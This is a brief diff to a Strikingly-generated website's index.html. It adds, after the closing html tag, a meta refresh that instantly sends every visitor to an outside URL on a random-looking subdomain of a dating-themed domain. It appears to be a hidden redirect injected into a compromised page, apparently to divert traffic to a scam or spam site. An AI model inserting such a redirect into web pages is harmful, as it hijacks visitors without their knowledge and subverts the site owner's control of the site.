--- a/index.html
+++ b/index.html
@@ -567,4 +567,7 @@ if (typeof getCookieItem === 'function' && !isDedicatedLandingPage && (getCookie
 </script>
 </body>
 </html>
+<meta http-equiv="refresh" content="0;url=https://y57phr8.reachlove-matcher.com/rc62qmx">
+
+
 <!-- Powered by Strikingly.com 4 (1) Jan 08, 2026 at 05:51-->
